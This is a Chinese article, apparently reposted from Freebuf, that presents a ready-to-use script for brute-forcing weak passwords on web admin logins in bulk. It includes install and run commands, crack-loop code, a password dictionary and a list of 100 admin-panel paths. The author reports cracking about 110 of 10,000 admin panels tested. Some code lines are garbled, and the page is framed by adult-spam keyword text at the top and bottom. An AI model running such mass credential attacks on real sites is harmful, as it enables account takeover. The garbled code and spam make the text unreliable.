国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Web弱口令通用檢測(cè)方法探究

安全 數(shù)據(jù)安全
目前的各種web口令破解工具大多是針對(duì)某個(gè)cms進(jìn)行設(shè)計(jì),或者類(lèi)似burpsuite需要手工配置,沒(méi)有見(jiàn)過(guò)能通用的破解工具,因此就有了這個(gè)小工具——通用web弱口令破解腳本。

注意:本腳本只是探討通用web口令破解的可行性,所有測(cè)試請(qǐng)自行搭建靶機(jī)環(huán)境或者在拿到目標(biāo)系統(tǒng)相關(guān)授權(quán)后再進(jìn)行測(cè)試。文中所涉及的技術(shù)、思路和工具僅供以安全為目的的學(xué)習(xí)交流使用,任何人不得將其用于非法用途以及盈利等目的,否則后果自行承擔(dān)!

[[262591]]

工具介紹

通用的web弱口令破解腳本,旨在批量檢測(cè)那些沒(méi)有驗(yàn)證碼的管理后臺(tái)。

隨著攻防演練和一些漏洞挖掘任務(wù)的增多,有時(shí)候需要大批量快速的檢測(cè)一些網(wǎng)站后臺(tái)安全性,特別是測(cè)試一些管理弱口令,這種難度不大但比較費(fèi)時(shí)費(fèi)力的工作就需要一個(gè)自動(dòng)化的腳本來(lái)完成了。但目前的各種web口令破解工具大多是針對(duì)某個(gè)cms進(jìn)行設(shè)計(jì),或者類(lèi)似burpsuite需要手工配置,沒(méi)有見(jiàn)過(guò)能通用的破解工具。

因此就有了這個(gè)小工具——通用web弱口令破解腳本,配合另一個(gè)信息搜集工具

https://github.com/TideSec/FuzzScanner 可以進(jìn)行批量快速刷分。

安裝使用

安裝使用都比較簡(jiǎn)單:

從Github上拖下來(lái)

  1. git clone https://github.com/TideSec/web_pwd_common_crack 

安裝requirements.txt依賴(lài)

  1. pip install -r requirements.txt 

運(yùn)行腳本即可

  1. python web_pwd_crack.py url.txt 50   --> url.txt為待掃描URL地址列表,50為線(xiàn)程數(shù),默認(rèn)為50 

url.txt為待檢測(cè)URL地址,可以自己寫(xiě)個(gè)腳本批量從搜索引擎獲取,也可以自己用目錄枚舉工具去搜集。

功能原理

1. 訪(fǎng)問(wèn)目標(biāo)地址,分析關(guān)鍵字

原理非常low,就是從頁(yè)面中提取表單,對(duì)表單中的內(nèi)容進(jìn)行檢索,發(fā)現(xiàn)存在用戶(hù)名、密碼、username、pwd、pass之類(lèi)的字段則認(rèn)為是登錄頁(yè)面,然后提取參數(shù)組成data數(shù)據(jù),發(fā)送給crack函數(shù)進(jìn)行破解。

由于現(xiàn)在各種網(wǎng)站的請(qǐng)求包的多樣性,目前沒(méi)法做到像wvs那樣能提取到所有的登錄post,只是根據(jù)簡(jiǎn)單的關(guān)鍵字進(jìn)行了提取。

  1. logins =['用戶(hù)名','密碼','login','denglu','登錄','user','pass','yonghu','mima','pwd','zhanghao','yonghu','name','email','account'] 

在測(cè)試中還發(fā)現(xiàn)有時(shí)候搜索框會(huì)干擾結(jié)果,所以把搜索框又進(jìn)行了排除

  1. sous = ['檢索','搜','search','查找','keyword','關(guān)鍵字'] 

另外,目前不支持自動(dòng)識(shí)別驗(yàn)證碼,所以對(duì)驗(yàn)證碼也進(jìn)行了排除

  1. yzms = ['驗(yàn)證碼','點(diǎn)擊更換','點(diǎn)擊刷新','checkcode','valicode','code','captcha'] 

2. 通過(guò)解析頁(yè)面獲取post地址及參數(shù)

  1. def get_post_get_page(content,url): 
  2.     form_action = str(content).split('\n')[0] 
  3.     # print form_action 
  4.     soup = BS(form_action, "lxml") 
  5.     url_path = '' 
  6.     for x in re.findall(".*?/",url): 
  7.         url_pathurl_path =  url_path+x 
  8.  
  9.     action_url = soup.form['action'] 
  10.     if str(action_url).startswith('http'): 
  11.         path = action_url 
  12.     else: 
  13.         path = url_path+soup.form['action'] 
  14.     method = soup.form['method'] 
  15.     return path,method 

3. 在獲取相關(guān)參數(shù)和path后調(diào)用破解函數(shù)web_crack進(jìn)行密碼破解

  1. def web_crack(method,path,data): 
  2.     conn =  requests.session() 
  3.     res0 = conn.get(path, headers=requests_headers(), allow_redirects=False,timeout=10,proxies = requests_proxies()) 
  4.     error_length,cookie_error_flag,dynamic_req_len = get_error_length(conn,method,path,data) 
  5.     if dynamic_req_len: 
  6.         return False,False 
  7.  
  8.     num = 0 
  9.     success_flag = 0 
  10.     dic_all = len(USERNAME_DIC)*len(PASSWORD_DIC) 
  11.     for user_name in USERNAME_DIC: 
  12.         for pass_word in PASSWORD_DIC: 
  13.             datadata1 = data 
  14.             # print data1 
  15.             user_nameuser_name = user_name.strip() 
  16.             pass_wordpass_word = pass_word.strip() 
  17.             pass_word = str(pass_word.replace('{user}', user_name)) 
  18.             data2 = str(data1.replace('%7Buser_name%7D', user_name)) 
  19.             data2 = str(data2.replace('%7Bpass_word%7D', pass_word)) 
  20.  
  21.             numnum = num+1 
  22.  
  23.             res = conn.post(url = path,data = data2headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies = requests_proxies()) 
  24.             cur_length = len(res.content+str(res.headers)) 
  25.  
  26.             if cookie_error_flag:  # cookie_error_flag表示每個(gè)數(shù)據(jù)包中都有cookie 
  27.                 if cur_length!=error_length: 
  28.                     success_flag =1 
  29.                     return user_name,pass_word 
  30.             elif 'Set-Cookie' in res.headers and cur_length!=error_length: 
  31.                 success_flag =1 
  32.                 return user_name,pass_word 
  33.     if success_flag == 0: 
  34.         return False,False 

配置了一個(gè)比較簡(jiǎn)單的字典

  1. USERNAME_DIC = ['admin','guest','test','ceshi','system'] 
  2. PASSWORD_DIC = ['123456','admin','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016','{user}2015','{user}!','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456','p@ssw0rd','a123456789','woaini1314','qwerasdf','123456a','123456789a','987654321','qwer!@#$','5201314520', 'q123456', '123456abc', '123123123', '123456.','0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX','12345','1234567','passw0rd','admin888'] 

4. 如何判斷破解成功

目前使用了幾種方式相互結(jié)合的方法來(lái)共同驗(yàn)證。

  • 通過(guò)返回包里有沒(méi)有Set-Cookie;
  • 返回?cái)?shù)據(jù)包的長(zhǎng)度變化;
  • 使用requests.session()進(jìn)行重驗(yàn)證;
  • 返回頁(yè)面的內(nèi)容匹配。
  • 優(yōu)化準(zhǔn)確度,加入了recheck函數(shù)

在測(cè)試時(shí)發(fā)現(xiàn)會(huì)出現(xiàn)誤報(bào)情況,所以對(duì)成功的賬戶(hù)密碼進(jìn)行了重驗(yàn)證。比如:

  • 有些系統(tǒng)在探測(cè)多次之后出現(xiàn)封ip之類(lèi)的情況,這時(shí)候會(huì)干擾破解腳本的判斷;
  • 有些系統(tǒng)在開(kāi)始的時(shí)候沒(méi)有驗(yàn)證碼,但錯(cuò)誤幾次后會(huì)出現(xiàn)驗(yàn)證碼;
  • 有些系統(tǒng)的提示信息會(huì)出現(xiàn)隨機(jī)的變更,導(dǎo)致誤報(bào)。

工作界面

掃描過(guò)程如下

screenshot

掃描成功的結(jié)果會(huì)保持在web_crack_ok.txt文件中

screenshot

掃描中識(shí)別到驗(yàn)證碼、phpmyadmin等所有的日志會(huì)保存在web_crack_log.txt文件中,后期可以根據(jù)log日志再進(jìn)行逐一篩查。

screenshot

其他說(shuō)明

其實(shí)在完成這個(gè)工具后,也開(kāi)始明白為什么市面上沒(méi)有通用的破解器,因?yàn)槌晒β实拇_不高!我測(cè)試過(guò)10000個(gè)管理后臺(tái),破解出來(lái)弱口令的大約110個(gè),有沒(méi)有漏報(bào)不清楚但基本沒(méi)有誤報(bào)。

成功率不高主要原因有:

  • web頁(yè)面類(lèi)型繁雜,很難準(zhǔn)確獲取并提交正確參數(shù);
  • 很多頁(yè)面都有驗(yàn)證碼,目前這個(gè)小腳本還沒(méi)法自動(dòng)識(shí)別驗(yàn)證碼;
  • 為了平衡時(shí)間和效率,使用了比較簡(jiǎn)單的用戶(hù)名和密碼字典,所以稍微復(fù)雜的密碼就破解不出來(lái)了。

我一般會(huì)使用dirsearch或之類(lèi)的目錄枚舉工具,配置一個(gè)比較輕便的管理后臺(tái)目錄字典,對(duì)目標(biāo)地址進(jìn)行批量掃描管理后臺(tái),然后再使用web_pwd_crack.py對(duì)這些后臺(tái)地址批量進(jìn)行弱口令破解。

貢獻(xiàn)一個(gè)比較精簡(jiǎn)的管理后臺(tái)字典(100條)

  1. admin/default/login.asp 
  2. admin/login.asp 
  3. admin/manage/login.asp 
  4. admin_login/login.asp 
  5. admincp/login.asp 
  6. administrator/login.asp 
  7. login.asp 
  8. manage/login.asp 
  9. manager/login.asp 
  10. member/login.asp 
  11. admin-login.php 
  12. admin/admin-login.php 
  13. admin/admin_login.php 
  14. admin/login.php 
  15. admin2/login.php 
  16. admin_area/login.php 
  17. admin_login.php 
  18. adminarea/login.php 
  19. admincontrol/login.php 
  20. administrator/login.php 
  21. administratorlogin.php 
  22. adminlogin.php 
  23. autologin.php 
  24. bb-admin/login.php 
  25. blog/wp-login.php 
  26. checklogin.php 
  27. login.php 
  28. modelsearch/login.php 
  29. moderator/login.php 
  30. nsw/admin/login.php 
  31. pages/admin/admin-login.php 
  32. panel-administracion/login.php 
  33. processlogin.php 
  34. rcjakar/admin/login.php 
  35. relogin.php 
  36. siteadmin/login.php 
  37. sqlbuddy/login.php 
  38. userlogin.php 
  39. usuarios/login.php 
  40. webadmin/login.php 
  41. wp-login.php 
  42. account/login.jsp 
  43. accounts/login.jsp 
  44. admin/login.jsp 
  45. auth/login.jsp 
  46. jsp/extension/login.jsp 
  47. login.jsp 
  48. member/login.jsp 
  49. members/login.jsp 
  50. portalAppAdmin/login.jsp 
  51. admin.jsp 
  52. netadmin.jsp 
  53. admin.php 
  54. admin.php3 
  55. admin/admin.php 
  56. admin_area/admin.php 
  57. adminarea/admin.php 
  58. authadmin.php 
  59. bb-admin/admin.php 
  60. checkadmin.php 
  61. cmsadmin.php 
  62. dbadmin.php 
  63. fileadmin.php 
  64. isadmin.php 
  65. linusadmin-phpinfo.php 
  66. memberadmin.php 
  67. moadmin.php 
  68. modelsearch/admin.php 
  69. moderator/admin.php 
  70. panel-administracion/admin.php 
  71. phpliteadmin.php 
  72. siteadmin.php 
  73. sysadmin.php 
  74. tmp/admin.php 
  75. ur-admin.php 
  76. user/admin.php 
  77. users/admin.php 
  78. webadmin.php 
  79. webadmin/admin.php 
  80. wp-content/plugins/akismet/admin.php 
  81. admin.asp 
  82. admin.aspx 
  83. admin/default/admin.asp 
  84. admin/manage/admin.asp 
  85. admin_login/admin.asp 
  86. administrator/admin.asp 
  87. article/admin/admin.asp 
  88. denglu/admin.asp 
  89. guanli/admin.asp 
  90. houtai/admin.asp 
  91. login/admin/admin.asp 
  92. manage/admin.asp 
  93. manager/admin.asp 
  94. member/admin.asp 
  95. admin/logon.jsp 
  96. admin/secure/logon.jsp 
  97. compass/logon.jsp 
  98. logon.jsp 
  99. logon/logon.jsp 

ToDo

  • 驗(yàn)證碼識(shí)別
  • 減少誤報(bào)率
  • 優(yōu)化編碼處理
  • 能不那么low

 

責(zé)任編輯:趙寧寧 來(lái)源: Freebuf
相關(guān)推薦

2014-06-06 10:01:31

2020-12-25 08:12:40

Web安全網(wǎng)絡(luò)安全

2015-11-11 14:08:07

2020-12-14 08:09:03

弱口令工具掃描

2024-09-06 07:27:52

2009-11-23 10:40:47

路由器口令

2013-04-23 14:20:52

Wireshark弱口令

2019-05-26 14:59:22

2013-12-15 18:15:57

弱口令烏云漏洞

2018-04-15 17:57:30

2020-12-28 09:42:25

弱密碼密碼加密

2019-03-07 16:05:59

webJettyTomcat

2020-11-19 08:00:00

Kubernetes工具開(kāi)發(fā)

2024-04-30 11:06:52

2015-09-21 09:26:15

2010-10-11 10:41:57

2009-10-21 16:34:03

Oracle用戶(hù)名重建索引

2021-02-06 12:05:24

SQL Serve后門(mén)惡意程序

2022-01-26 10:09:25

安全漏洞掃描工具緩存投毒漏洞

2013-04-19 13:20:14

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

国产91丝袜在线播放九色| 777午夜精品免费视频| 欧美日韩亚洲免费| 成人资源在线播放| 精品久久久久久亚洲综合网| 中文字幕视频在线观看| 国产精品美女久久久久高潮 | 国产高清一区二区三区视频| 亚洲男人电影天堂| 自拍偷拍一区二区三区四区| 成人一区在线观看| 亚洲精品乱码久久久久久蜜桃91| 欧美日韩1080p| 国产精品中文字幕在线| 大型av综合网站| 欧美激情在线视频二区| 日本黄色一区| zzijzzij亚洲日本成熟少妇| 免费成人直播| 在线丨暗呦小u女国产精品| 亚洲人成在线网站| 一个色综合导航| 北岛玲heyzo一区二区| 日韩黄在线观看| 免费一二一二在线视频| 亚洲欧美在线免费| 91精品国产66| 欧美成人精品h版在线观看| 亚洲精品一区二区三区在线| 欧美激情一区二区三区久久久| 精品精品视频| 日本a级片电影一区二区| 亚洲品质自拍| 91久久久精品| 亚洲永久网站| 自拍亚洲欧美老师丝袜| 成人毛片老司机大片| 五月天婷婷激情视频| 亚洲精品国久久99热| 美女永久在线网站| 欧美三级一区二区| 123区在线| xxx一区二区| 日韩一级电影| 99视频国产精品免费观看| 丝袜美腿成人在线| 91传媒免费视频| 亚洲国产精品成人久久综合一区| 开心丁香婷婷深爱五月| 欧美日韩国产片| 妞干网免费在线视频| 欧美高清性猛交| 欧美激情国产在线| 宅男噜噜99国产精品观看免费| 99精品在线观看视频| 午夜男人视频在线观看| 91精品国产91久久久久久一区二区| 浪潮色综合久久天堂| 欧美最猛性xxxxx亚洲精品| 亚洲免费大片| 免费看毛片的网址| 欧美日韩国产中字| 欧美私密网站| 国产精品欧美激情| 日本va欧美va瓶| 明星乱亚洲合成图.com| 欧美视频自拍偷拍| 亚洲欧洲日韩精品在线| 成人做爽爽免费视频| 国产99久久久精品| 永久在线免费观看| 日韩在线免费av| 中出一区二区| 国产中文字幕视频在线观看| 欧美日韩另类在线| 色999韩欧美国产综合俺来也| 国产精品久久久久久一区二区| 日韩精品乱码免费| 白浆爆出在线观看| 亚洲精品小视频| 久久中文字幕av| 野外做受又硬又粗又大视频√| 五月激情综合婷婷| 高清不卡一区| 欧美精品123| 国产精品美女一区二区三区| 182tv在线播放| 国产精品久久77777| 久久超碰97中文字幕| 在线国产福利网站| 久久伊人色综合| 亚洲欧美日韩一区在线观看| 免费一级电影| 中文字幕欧美国内| 久久一区激情| 亚洲成人男人天堂| 欧美精品成人在线| 国产成人福利片| 麻豆网站视频在线观看| 国产精品高潮视频| 久久欧美一区二区| 在线日韩影院| 黄色小网站91| 精品毛片网大全| 黄色美女久久久| 妞干网在线观看视频| 日韩一级成人av| 伊人久久大香线| 激情六月婷婷| 97av在线视频| 久久色在线观看| 电影在线观看一区二区| 三区精品视频观看| 欧美日韩午夜影院| 久久亚洲在线| 香港经典三级在线| 国内精品久久久久影院优| 国产又黄又大久久| 免费毛片在线看片免费丝瓜视频| 97人摸人人澡人人人超一碰| 成人免费视频在线观看| 日韩中文一区二区| 黑人糟蹋人妻hd中文字幕| 中文在线不卡视频| 国产高清不卡一区二区| 高潮在线视频| 久久久久久久久久久久久久久久av | 99精彩视频| 亚洲国产精品人人做人人爽| caoporn成人| 熟女人妇 成熟妇女系列视频| 在线精品高清中文字幕| 国产成人免费视频网站高清观看视频 | 欧洲一区二区三区在线| 久久综合国产| 色影视在线视频资源站| 国产区亚洲区欧美区| 亚洲香肠在线观看| 99精品一区| 一级片免费在线观看| 92国产精品久久久久首页 | 一本大道久久a久久精二百 | 三上悠亚一区二区三区| 情事1991在线| 亚洲视频中文字幕| 欧美精品羞羞答答| 在线国产视频| 国产精品久久久久久久小唯西川| 在线视频你懂得一区| 国产日韩1区| wwww在线观看免费视频| 日韩一区二区高清视频| 深夜福利91大全| 亚洲国产精华液网站w| 亚洲黄色录像| 东热在线免费视频| 视频一区在线免费观看| 中文字幕亚洲激情| 国产精品久久久久久亚洲伦| 奇米色欧美一区二区三区| 完全免费av在线播放| 日本一区二区三区视频在线观看 | 玖玖玖电影综合影院| www日韩在线观看| 51精品国产黑色丝袜高跟鞋| 欧美色视频日本版| 久久青草久久| 成人永久在线| 尤物视频网站在线观看| 亚洲一区二区在线看| 久久6免费高清热精品| 精品国产福利在线| 日本欧美在线观看| 欧美经典一区| 一卡二卡三卡亚洲| 亚洲午夜精品国产| 不卡av电影在线观看| 午夜av区久久| 久久综合综合久久综合| 欧美交a欧美精品喷水| 成年人在线观看视频| 日本欧美视频在线观看| 国产精品第3页| 日韩视频免费观看高清完整版| 成人白浆超碰人人人人| 成人精品中文字幕| h片在线观看视频免费免费| 国产主播在线看| 91麻豆国产语对白在线观看| 精品视频在线观看日韩| 亚洲人妖av一区二区| 美腿丝袜在线亚洲一区| 视频一区在线| 成人在线直播| 亚洲老女人av| 婷婷五月色综合| 奇米4444一区二区三区| 日韩欧美国产综合在线一区二区三区 | 天堂av在线一区| 日韩精品免费一区二区三区竹菊|